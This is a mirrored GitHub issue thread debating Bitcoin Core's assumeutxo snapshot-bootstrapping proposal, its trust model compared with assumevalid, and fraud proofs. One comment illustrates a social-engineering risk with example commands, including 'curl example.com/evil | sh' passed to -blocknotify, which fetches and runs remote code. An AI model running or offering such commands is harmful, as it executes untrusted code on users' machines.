assumeutxo #15605

issue jamesob openend this issue on March 15, 2019
  1. jamesob commented at 1:48 pm on March 15, 2019: member

    A more detailed proposal can be found here: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal


    I’d like to talk about the desirability of an assumeutxo feature, which would allow much faster node bootstrapping in the spirit of assumevalid. For those unfamiliar with assumeutxo, here’s an informal description from one of last year’s meetings:

    “Assume UTXO” is an idea similar to assumevalid. In assumevalid, you have a hash that is hard-coded into the code, and you assume all the blocks in the chain that ends in that hash, that those transactions have valid scripts. This is an optimization for startup to not have to do script checks if you’re willing to believe that the developers were able to properly review and validate up to that point. You could do something similar, where you cache the validity of the particular UTXO set, and it’s ACKed by developers before updating the code. Anyone can independently recompute that value. There’s some nuanced considerations for this […]. The downside if you fuck up is bigger. In assumevalid, you can trick someone into thinking the block is valid if it wasn’t, and assumeutxo you might be able to create coins or something; there are definitely different failure modes. So there’re different security implications here. You could use assumeutxo, but you could go back and double check later. But there’s nuance about how this should be done or how. You could have nodes that export this value, [and so one attack might be] you could lie to your friend I guess, but that’s less scary than other things.

    In other words, assumeutxo would be a way to initialize a node using a headers chain and a serialized version of the UTXO state which was generated from another node at some block height. A client making use of this UTXO “snapshot” would specify a hash and expect the content of the resulting UTXO set to yield this hash after deserialization.

    This would allow users to bootstrap a usable pruned node & wallet far more quickly from a ~3GB file (at time of writing) rather than waiting for a full initial block download to complete, since we only have to sync blocks between the base of the snapshot and the current network tip. Needless to say this is at expense of operating under a different trust model (albeit temporarily), though how different this really ends up being from assumevalid in effect is worth debate.

    An implementation of assumeutxo could allow background validation of the loaded UTXO snapshot to happen concurrently with use of the assumed chain, so the trust model is only relaxed for a limited amount of time. Conceptually this is pretty straightforward: you’d have two chainstates maintained simultaneously, one of which is doing an IBD from genesis up to the base of the snapshot and the other (i.e. the assumed chain) just doing tip maintenance and servicing immediate requests for chain data. Once the validation chainstate reaches the height of the snapshot base, it computes a hash of the UTXO set it built and compares it to the snapshot’s hash. If it matches, we throw the validation chainstate away and continue to operate on the “assumed” (but now fully validated) chain - otherwise we pitch a fit in the logs and GUI, and either revert to the validation chainstate and continue traditional IBD or simply shutdown.

    Specifying assumeutxo

    The assumeutxo value/height pairings could be committed in much the same way that we currently update assumevalid. Eventually (and this is not a new idea) we could consider using a rolling UTXO set hash or some similar technology to commit to the UTXO set hash in each block header, though this of course ends up being a consensus change. This would obviate the need for any hardcoded assumeutxo value since bootstrapping nodes could obtain the headers chain, choose a UTXO set hash value at some height, and then obtain the correspondent UTXO snapshot from their peers on the basis of that hash.

    Obtaining snapshots

    Snapshots could be obtained from a variety of sources, whether over the peer network or centralized content distribution networks (CDNs). It doesn’t really matter since security is contingent on a content hash, though if assumeutxo ends up being something we actually want to support then I’d imagine we would build a means of distribution through the peer network.

    Steps

    I’ve already drafted up an implementation of this that excludes any P2P mechanism for distributing snapshots but makes the changes necessary for loading snapshots and doing concurrent background validation. It exposes two new RPC commands, dumptxoutset and loadtxoutset, to provide a test harness for creating and loading snapshots. Whether or not we’d actually want to commit that RPC interface is something I’d like input on.

    Another option is to eschew a loadtxoutset RPC and use a -utxosnapshot=<path> startup parameter.

    Afterwards, supposing we get that far, we’ll probably want to think about implementing P2P distribution of snapshots, and then maybe starting thinking about a rolling UTXO set hash for potential inclusion in block headers.

    Questions

    I’m curious for general opinions on this idea and the concrete implementation steps. If this ends up being desirable for the project, it’ll require a lot of refactoring and will probably result in a lengthy succession of incremental PRs (a la the process separation effort), though I am of course happy to propose large, cohesive diffs too. :)

    Specific questions I have are:

    1. Does the assumeutxo trust model differ materially from assumevalid? If so, how? Is it too aggressive a departure from our existing trust model?
    2. If we agree this is a feature worth supporting, does the sequence of “RPC commands -> hardcoded assumeutxo value, optional use, P2P distribution -> UTXO rolling set hash block header commitment” make sense?
  2. fanquake added the label Validation on Mar 15, 2019
  3. maflcko commented at 2:13 pm on March 15, 2019: member
    I think this is materially different from -assumevalid, because there are additional safety features built into assumevalid that are not possible (as of now) for assumeutxo: assumevalid must be a block hash in a headers chain that has overall valid POW and is covered in two weeks worth of POW on top of the assumevalid block. Also, all utxo operations (adding and removing coins) before assumevalid must be fully valid except for the script check, which is optionally skipped. So you couldn’t create coins out of thin air with assumevalid. assumeutxo does not have those “belt and suspenders”. So if an assumeutxo hash is put into the code base (after review), it must not be possible for a user to simply pass in (either by mistake or consciously) their own hash via command line argument or otherwise.
  4. maflcko added the label Brainstorming on Mar 15, 2019
  5. luke-jr commented at 6:04 pm on March 15, 2019: member
    Concept NACK, this significantly changes Bitcoin’s security model.
  6. sipa commented at 7:11 pm on March 15, 2019: member

    additional safety features built into assumevalid that are not possible (as of now) for assumeutxo: assumevalid must be a block hash in a headers chain that has overall valid POW and is covered in two weeks worth of POW on top of the assumevalid block.

    I don’t see why this isn’t possible for assumeutxo? You would include the tip block hash in the data hashed for assumeutxo, and the UTXO set you receive would need to include that hash (stating which block it is for). If the resulting hash isn’t sufficiently deeply buried in the headers chain, you reject it.

    So you couldn’t create coins out of thin air with assumevalid.

    With assumeutxo you can still have an inflation check (because the total accumulated subsidy is known for each height), so I don’t think there is a difference. The only failure an invalid assumeutxo could lead to is incorrectly assigning coins, but the same is possible right now with an invalid assumevalid (which doesn’t prevent theft).

  7. jamesob commented at 10:39 pm on March 16, 2019: member

    The only failure an invalid assumeutxo could lead to is incorrectly assigning coins, but the same is possible right now with an invalid assumevalid (which doesn’t prevent theft).

    I think there’s an argument to be made that convincing someone of an incorrect coin assignment is easier in assumeutxo because under assumevalid you’d have to reconstruct a valid series of blocks (with the accompanying PoW) after the bad coin assignment. In assumeutxo, if you can convince someone to accept a malicious hash, all the attacker has to do is serialize their modified set with no concern for alternate PoW construction. You wouldn’t find out about this until the background validation process catches up to the block where the incorrect assignment happened.

  8. maflcko commented at 9:32 pm on March 17, 2019: member

    I don’t see why this isn’t possible for assumeutxo?

    The logic itself is possible to implement in the same fashion, but not the trust model (allowing users to set the hash to an arbitrary one on the command line). With “out of thin air” I meant “without effort” (other than telling the user on my website to set -assumeutxo=myhash and then download myutxoset.dat). That is solved, if it is absolutely not possible for the user to set the hash.

  9. harding commented at 1:11 pm on April 8, 2019: contributor

    With “out of thin air” I meant “without effort” (other than telling the user on my website to set -assumeutxo=myhash and then download myutxoset.dat). @MarcoFalke but can’t the malicious party now just tell the user to wget example.com/evilutxoset.tar.gz && tar xzf evilutxoset.tar.gz? Or, if they wanted to make it look like a bitcoind configuration option, bitcoind -blocknotify "curl example.com/evil | sh".

    Maybe it’d be satisfactory to just give the option a name that better hints at the danger of using it with an untrusted source, e.g. -trustedutxo or -balance-snapshot-you-trust.

  10. maflcko commented at 4:27 pm on April 10, 2019: member

    Indeed they can. Though they might also encourage you to buy backdoored hardware. Generally Bitcoin Core assumes that the underlying architecture (hardware, filesystem, operating system, network sockets, …) are not tampered with. There is nothing we can do to prevent that.

    However, if it comes to Bitcoin Core internals, we should not allow backdoors and footguns. For example allowing users to modify consensus settings on the command line (like block size, the utxo set, …).

    For regtest it could make sense to allow setting this to simplify testing.

  11. jamesob commented at 3:28 pm on April 23, 2019: member

    I’ve created a draft proposal for assumeutxo here: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal

    If anyone would like to leave inline comments, the associated PR is here: https://github.com/jamesob/assumeutxo-docs/pull/1

  12. maflcko referenced this in commit b2a6b02161 on May 7, 2019
  13. sidhujag referenced this in commit dced7ccc66 on May 7, 2019
  14. bitcoin deleted a comment on May 9, 2019
  15. fresheneesz commented at 10:00 pm on May 26, 2019: none

    I think James’s proposal addresses many of the concerns that have been brought up.

    I think its worth noting that the solution to the “one practical security difference” in phase 1 or 2, is not resilient in an adversarial environment. This could be solved by having a client ask all of its connections to verify that the UTXO snapshot is correct, and if any one of its connections says the UTXO set isn’t correct, the client would then the client would build the UTXO set from scratch. However, it would be easy for an attacker to force many or even most newly connecting clients to build it from scratch - which defeats the purpose of the upgrade (ie scalability). Assumevalid doesn’t have this problems since verifying claims about chain validity is much easier than verifying claims about UTXO set validity. Phase 3 solves the problem in a much nicer way.

    So you couldn’t create coins out of thin air with assumevalid. assumeutxo does not have those “belt and suspenders”.

    Even if we allow the user enter a golden UTXO hash, I believe

    if it comes to Bitcoin Core internals, we should not allow backdoors and footguns. For example allowing users to modify consensus settings on the command line

    I agree. And so does Pieter Wuille: “allowing [utxo snapshots] to be configured is even more scary (e.g. some website saying “speed up your sync, start with this command line flag!”).”. If all 3 phases of jamesob’s are implemented tho, allowing the user to input a UTXO snapshot would be safe, since the client could efficiently verify the truth of the claim and ignore it if its not true.

  16. laanwj referenced this in commit 5d37c1bde0 on Jun 5, 2019
  17. sidhujag referenced this in commit 252b7cf94b on Jun 6, 2019
  18. mandelmonkey commented at 10:01 am on June 30, 2019: none
    Does assumeutxo offer any benefits that just bootstrapping with BIP 157/158 Neutrino whilst IBD is being performed doesn’t? I suppose this is a “cleaner” approach as you are not running and extra client/service but sounds likes anybody wanting to bootstrap say a mobile full node could do so today with a lightclient/fullnode hybrid
  19. maflcko commented at 1:49 pm on June 30, 2019: member

    Does assumeutxo offer any benefits that just bootstrapping with BIP 157/158 Neutrino whilst IBD is being performed doesn’t?

    blockfilters provide no means of bootstrapping your utxo set, so that you can start using all full node functionality (block/tx validation, block/tx propagation, …) at the tip.

  20. mandelmonkey commented at 2:05 pm on June 30, 2019: none

    Does assumeutxo offer any benefits that just bootstrapping with BIP 157/158 Neutrino whilst IBD is being performed doesn’t?

    blockfilters provide no means of bootstrapping your utxo set, so that you can start using all full node functionality (block/tx validation, block/tx propagation, …) at the tip.

    thanks I meant that you have a lightclient running along side your fullnode, so you can use your wallet with the lightclient whilst your fullnode is performing IBD, once finished it switches over. assumeutxo is a cleaner option as explained here, but I am thinking in terms of mobile wallets, where having to download X megabytes after being offline for a few days/weeks is slower than using blockfilters to sync.

  21. laanwj referenced this in commit 8f604361eb on Jul 16, 2019
  22. fanquake referenced this in commit 848f245d04 on Jul 23, 2019
  23. sidhujag referenced this in commit 17e7b271dd on Jul 29, 2019
  24. maflcko referenced this in commit 85883a9f8e on Aug 15, 2019
  25. maflcko referenced this in commit a7be1cc92b on Aug 27, 2019
  26. sidhujag referenced this in commit 717747348e on Aug 27, 2019
  27. maflcko referenced this in commit 7d4bc60f1f on Sep 19, 2019
  28. sidhujag referenced this in commit d8a09acbc9 on Sep 23, 2019
  29. laanwj referenced this in commit a37f4c220a on Oct 30, 2019
  30. laanwj referenced this in commit b05b28183c on Nov 5, 2019
  31. sidhujag referenced this in commit 9df460f09f on Nov 7, 2019
  32. laanwj referenced this in commit 2ed74a43a0 on Jan 13, 2020
  33. sidhujag referenced this in commit ab2fb60cfa on Jan 14, 2020
  34. maflcko referenced this in commit 10358a381a on Apr 10, 2020
  35. sidhujag referenced this in commit d35bad573a on Apr 13, 2020
  36. maflcko referenced this in commit 2f71a1ea35 on Jul 29, 2020
  37. sidhujag referenced this in commit 191c48d32d on Jul 31, 2020
  38. sidhujag referenced this in commit f0b0681fa2 on Nov 10, 2020
  39. sidhujag referenced this in commit 8e75779f0e on Nov 10, 2020
  40. UdjinM6 referenced this in commit 9ab9422d7b on Nov 17, 2020
  41. UdjinM6 referenced this in commit 36d275396f on Dec 1, 2020
  42. PastaPastaPasta referenced this in commit b559a8f904 on Dec 15, 2020
  43. andronoob commented at 2:04 pm on December 28, 2020: none

    In assumeutxo, if you can convince someone to accept a malicious hash, all the attacker has to do is serialize their modified set with no concern for alternate PoW construction

    If we agree this is a feature worth supporting, does the sequence of “RPC commands -> hardcoded assumeutxo value, optional use, P2P distribution -> UTXO rolling set hash block header commitment” make sense?

    Committing hash of UTXO set to the blockchain can bring the same PoW check to UTXO snapshots. However it’s probably still not equivalent to the current assumevalid situation. The hardcoded assumevalid block hash doesn’t imply data availability, the burdensome blockchain downloading is actually validating data availability without trusting the developers who specified such hash. AFAIK data availability is the main reason why fraud proofs can’t work.

  44. andronoob commented at 2:09 pm on December 28, 2020: none
    However in reality I still wish such rolling UTXO set commitment (in consensus level) to happen, because people will still try to achieve the same UTXO snapshot goal in even less secure ways (like, downloading UTXO set from random websites to overwrite the entire chainstate subdirectory).
  45. fresheneesz commented at 7:02 pm on December 28, 2020: none

    The hardcoded assumevalid block hash doesn’t imply data availability

    Data availability for used transaction outputs is unnecessary. Availability of UTXOs at the point of the assumevalid hash is necessary, and a node will not consider a blockchain valid without it. What data availability would not be validated that you think needs to be?

    without trusting the developers who specified such hash

    I want to point out that you need not trust developers any more than normal with this - many many people will still be reviewing code changes, you still need to trust that distributers of the software aren’t malicious (in a way that version validation eg validating GPG sig can’t cover).

  46. andronoob commented at 6:01 am on December 29, 2020: none

    Data availability for used transaction outputs is unnecessary. Availability of UTXOs at the point of the assumevalid hash is necessary, and a node will not consider a blockchain valid without it. What data availability would not be validated that you think needs to be?

    I didn’t believe it either, until I learned the story of fraud proofs.

    I want to point out that you need not trust developers any more than normal with this - many many people will still be reviewing code changes, you still need to trust that distributers of the software aren’t malicious (in a way that version validation eg validating GPG sig can’t cover).

    I was talking about committing UTXO hash into the blockchain, by the miners, rather than the current proposal (hard-coded) which trusts the developers just like assumevalid.

  47. fresheneesz commented at 7:04 am on December 29, 2020: none

    I didn’t believe it either, until I learned the story of fraud proofs.

    Enlighten us…

    committing UTXO hash into the blockchain, by the miners, rather than the current proposal (hard-coded) which trusts the developers just like assumevalid.

    I see. I’m in support of that. However, I don’t think it materially reduces trust in the UTXO hashes. If the software you’re using is malicious, no amount of hashpower behind a UTXO hash will save you (because your software can simply decide to ignore it).

  48. andronoob commented at 2:19 pm on December 29, 2020: none

    Enlighten us…

    I’m not sure whether I’ve misunderstood this topic either. I’ll just try my best.

    The idea of fraud proofs originated from Satoshi’s whitepaper. Satoshi’s whitepaper described that although SPV client cannot validate transactions on its own, it may still receive alarms from fully validating nodes, which points them to the position where something invalid appears, so that SPV client can then download & verify the pointed blocks on its own, to avoid blindly following an invalid chain with more PoW.

    For example, if a transaction spends a spent coin once again, a fraud proof which consists of Merkle proofs of both the original transaction and the double-spending invalid transaction can be sent to SPV clients, then SPV clients can validate such proof without downloading blockchain, so finally SPV clients will know it’s an invalid chain which shouldn’t be followed.

    We can see that the fraud proofs were supposed to work just like “supervision by public opinion” in real life, and even better, it was supposed to be “fact-based” rather than “opinion-based”, because the fraud proofs were supposed to be succint, and, verifiable without the gigantic blockchain data.

    With the help of fraud proofs, SPV was supposed to work almostly as secure as a fully validating node.

    However, such strategy has a fatal flaw: to generate a fraud proof, the invalid part of the block must be known in first place. If some part of a block can’t be downloaded, you can’t convince other people that it’s impossible to fully download such block, other people must try downloading it on their own to see whether it’s truly undownloadable.

    For example, a normal valid block has its own Merkle tree, where each leaf node is hash of a valid transaction. If you put something which isn’t a hash at all (so that it doesn’t have any known preimage) into the Merkle tree, then nobody can provide the “full block data”. Fully validating nodes won’t accept such malformed blocks, but SPV clients will still blindly accept Merkle proofs of such malformed blocks. Fully validating nodes can’t prove it’s malformed either, at best SPV clients still needs to try downloading the specified block on their own, which on the other side becomes a DoS vector that attacker can send false alarms to trick SPV clients into downloading existing (valid) blocks, wasting their bandwidth, so that the goal of lightweight SPV client is destroyed.

    Back to the topic of fully validating node which just skips downloading the gigantic historical blockchain data: as long as you don’t validate all blocks before the UTXO snapshot, you won’t know whether some similar invalid/malformed things sneaked into those “unknown” blocks. You can’t hope someone will alert you either, because you won’t know whether it’s a false alarm. With the default assumevalid situation, although you don’t fully verify the contents of historical blocks either, it’s still theoretically (it’s theoretical for now, because there are cases which need some currently missing additional commitment structure, like: spending never existed UTXOs) possible to generate a fraud proof which contains objectively irrefutable evidence proving some block is violating the consensus rules.

  49. andronoob commented at 2:39 pm on December 29, 2020: none

    However, I don’t think it materially reduces trust in the UTXO hashes. If the software you’re using is malicious, no amount of hashpower behind a UTXO hash will save you (because your software can simply decide to ignore it).

    AFAIK, in Bitcoin, miners are not supposed to be trusted at all, let alone comparing to developers. I never mentioned that miners can reduce trust on developers (who hard-code UTXO hashes into the software - of course, they can do much more evil things than hard-coding malicious UTXO hashes).

  50. andronoob commented at 2:52 pm on December 29, 2020: none

    A lot of people think that after adding (a new consensus rule enforcing miners to provide on-chain) UTXO commitments (and then brand-new full nodes can skip downloading the gigantic historical blockchain data with the help of it), Bitcoin will work in the same way it has been working up till now. After all, every bitcoin transaction is confirmed by miners. Some people just disagree with this point - maybe @luke-jr is one of them, so that he commented “Concept NACK, this significantly changes Bitcoin’s security model” above.

    In my opinion, as long as a typical PC with common Internet connection is still able (not “required”, “forced” etc) to fully validate the entire blockchain, skipping downloading the old blocks would be fine - after all, those old blocks have been repeatedly validated for tens of thousands of times.

  51. fresheneesz commented at 9:24 pm on December 29, 2020: none

    at best SPV clients still needs to try downloading the specified block on their own

    Valid uses of this would be extraordinarily rare. Even 1 block per year would be far more frequent than is at all likely. The bandwidth needed is small, even for lightweight SPV nodes.

    a DoS vector that attacker can send false alarms to trick SPV clients into downloading existing (valid) blocks, wasting their bandwidth

    That’s true, however there is already a way of dealing with bad behavior from connected nodes: disconnect from them. As long as the network of SPV servers is decentralized and honest nodes compose a significant fraction of those SPV servers, there’s a pretty low limit of possible shenanigans.

    For example, let’s say your pool of SPV servers consists of 70% honest nodes, and 30% malicious actors. If your SPV node is connecting to 10 SPV servers, an average of 3 of them will be malicious and can send 3 fake fraud claims that results in 3 (extra) blocks of download. After disconnecting from those 3 jokers, an average of 1 of the 3 new SPV servers they connect to will be malicious, resulting in a 4th extra block download. The last new SPV node would not usually be malicious. That’s 4 extra blocks, that hardly destroys the goal of having a lightweight node.

    So even if you have a massive fraction of malicious nodes, you can’t realy troll SPV nodes that hard as long as they’re following best practices and disconnecting from nodes that give them bad data.

    as long as a typical PC with common Internet connection is still able (not “required”, “forced” etc) to fully validate the entire blockchain, skipping downloading the old blocks would be fine

    I think its very important that the Bitcoin community come to a consensus around bounadaries of what we consider “safe” as far as resource usage. What is the minimum resources of that “typical PC with a common internet connection”? If we need to support practical verifiability of the entire chain on below-average machines with below average resources, we need to limit the blockchain’s grow much more than if we decided we only need to support practical verifiability of the entire chain by “average or better” machines etc. Once we decide on the power of machines we think we need to support, we can then calculate how big blocks can safely be.

  52. andronoob commented at 2:38 am on December 30, 2020: none

    Valid uses of this would be extraordinarily rare. Even 1 block per year would be far more frequent than is at all likely. The bandwidth needed is small, even for lightweight SPV nodes.

    Just one rule-breaking transaction could already be catastrophic - like, minting 1 trillion coins out of thin air (it could be done through many ways, like, spending nonexistent UTXOs).

    It’s not about bargaining over bandwidth either. The point was that you can’t know whether the alarm you received is a malicious false alarm. Even if you see a block failed to be downloaded, you can’t convince others - “oh, must be a temporary network connectivity issue, maybe you should just try again?”

    As long as the network of SPV servers is decentralized and honest nodes compose a significant fraction of those SPV servers

    Just like what Satoshi’s whitepaper had outlined:

    If the majority were based on one-IP-address-one-vote, it could be subverted by anyone able to allocate many IPs.

    Miners are not naturally honest or selfless - it’s on the contrary expected for them to behave greedily, selfishly and rationally. Miners are just incentivised to behave honestly under the constraints of consensus rules, or in other words, game theory.

    Miners respect the consensus rules because they know other people will verify the blocks they mined according those rules - if they dare to let anything violating the rules sneak in, then no one will accept their hard-mined (costs expensive electricity in real world) block.

    (To be honest, AFAIK, there are disagreements around this point - some people believe that only miners should verify the blocks, while some other people believe that it’s not only miners but the economic majority should also always verify the blocks)

    I think its very important that the Bitcoin community come to a consensus around bounadaries of what we consider “safe” as far as resource usage. What is the minimum resources of that “typical PC with a common internet connection”? If we need to support practical verifiability of the entire chain on below-average machines with below average resources, we need to limit the blockchain’s grow much more than if we decided we only need to support practical verifiability of the entire chain by “average or better” machines etc.

    Agreed.

  53. andronoob commented at 2:50 am on December 30, 2020: none
    I see your point that successfully downloading a block proves that the alarm was a false one. However (let alone sybil attack) it still can’t save the idea of fraud proofs, because even if you have failed to download a block, you are still not sure whether it’s just some network connectivity issue - like the case of a stalled bittorrent which lacks seeders. In the end the alarm is still going to be ignored.
  54. fresheneesz commented at 8:21 am on December 30, 2020: none

    Just one rule-breaking transaction could already be catastrophic

    I think I know what you mean, but a rule-breaking transaction that inflates the supply of bitcoin is not relevant to fraud proofs. The rare event I was talking about in a bitcoin with fraud proofs would be where a majority of mining power tried to fork the blockchain in ways that would fool SPV nodes. If fraud proofs were in place, this would not only be incredibly difficult to pull of (as it would be without fraud proofs), but would also be unsuccessful. Without fraud proofs, such a scenario could succeed, and it could be catestrophic.

    The point was that you can’t know whether the alarm you received is a malicious false alarm.

    That’s simply not true. You download the accused block, you validate it, and then you know.

    Even if you see a block failed to be downloaded, you can’t convince others - “oh, must be a temporary network connectivity issue, maybe you should just try again?”

    If a node can’t download a block, then its invalid, full stop. You don’t accept that a block is valid if you can’t download it. Why would you? If someone can’t download it, they should be very convinced that its not a valid block until shown otherwise.

    In the end the alarm is still going to be ignored.

    If you program the SPV node software to not ignore that, it won’t be ignored. It would be a pretty stupid rule to ignore the fact that the data is not available.

  55. andronoob commented at 9:58 am on December 30, 2020: none

    You can’t know whether a block is downloadable (let alone its validity) before actually trying downloading it on your own. There are currently hundreds of thousands of historical blocks up till now, if some stranger tell you block XXXXXX can’t be downloaded, what can you do? You must try downloading it on your own. Even if you can finally rule out all false alarms, you still have already paid expensive price.

    Not accepting a block is also not the same situation to rejecting a block, the later requires known, clear evidence. For example, a full node won’t accept a valid block either, until it’s fully downloaded & verified.

    If you decide to mark a chain (which you haven’t fully downloaded it) as invalid simply because you failed to download some blocks of it, probably a temporary network connectivity issue (which can be either unintentional or intentional/malicious) can effectively shut down your full node, which is even worse than being tricked into downloading (almostly) the entire blockchain.

  56. fresheneesz commented at 7:02 pm on December 30, 2020: none
    @andronoob I disagree that your points support your proposition that fraud proofs aren’t useful/workable. But I don’t think this conversation is productive for this issue. If you want to keep discussing it, PM me on reddit.
  57. andronoob commented at 2:25 am on December 31, 2020: none

    @fresheneesz I think it’s more a theoretical problem rather than a practical one as well.

    There’s already a stackexchange question: https://bitcoin.stackexchange.com/questions/83422/is-the-idea-of-fraud-proofs-possible-in-reality

  58. laanwj referenced this in commit 92fee79dab on Feb 16, 2021
  59. ryanofsky commented at 10:34 am on July 21, 2021: contributor

    (from IRC)

    <jamesob> Do we ever expect to support an index that actually requires sequential indexing? Jimpo’s BaseIndex advertises that it will index sequentially, but at the moment none of the particular indexers require this. Furthermore, we will have BlockConnected events triggering indexing out of order once we start using background chainstates for assumeutxo

    I don’t think it affects when you’re doing here, but I think of wallets as mini-indexes requiring sequential indexing. Wallets need to scan blocks in sequential order so the IsFromMe check in AddToWalletIfInvolvingMe) will work. Eventually after #15719 I think wallets and indexes should use the same interfaces::Chain sync / rescan / block connected / rewind interface and hooks and work more efficiently together

  60. PhotoshiNakamoto referenced this in commit cda98e1821 on Dec 11, 2021
  61. gades referenced this in commit 6a887db9d9 on Mar 11, 2022
  62. fanquake referenced this in commit 82903a7a8d on Jan 30, 2023
  63. sidhujag referenced this in commit 8ff3d69a6a on Jan 30, 2023
  64. pinheadmz closed this on Apr 27, 2023

  65. rebroad commented at 11:07 am on May 12, 2023: contributor

    Regarding bootstrapping a pruned node from a full-node, the way I’d do it is to bitcoin-cli the running node to stop it accepting any more blocks or transactions, copy –reflink=always the block index and chainstate to a new bitcoind instance, bitcoin-cli the running node to resume accepting blocks and transactions, modify the new instance to use new ports, and enable pruning, and run it, wait for it to prune the block index, and then exit, and voila, I have a ready to copy bitcoind instance that I can install elsewhere.

    I’m not really sure it needs to be much more complicated than this, although ideally a way to do it without suspending activity on the main instance would be nice, but hardly worth it given the relatively little downtime the above method causes.

  66. bitcoin locked this on May 11, 2024

github-metadata-mirror

This is a metadata mirror of the GitHub repository bitcoin/bitcoin. This site is not affiliated with GitHub. Content is generated from a GitHub metadata backup.
generated: 2024-09-27 19:12 UTC

This site is hosted by @0xB10C
More mirrored repositories can be found on mirror.b10c.me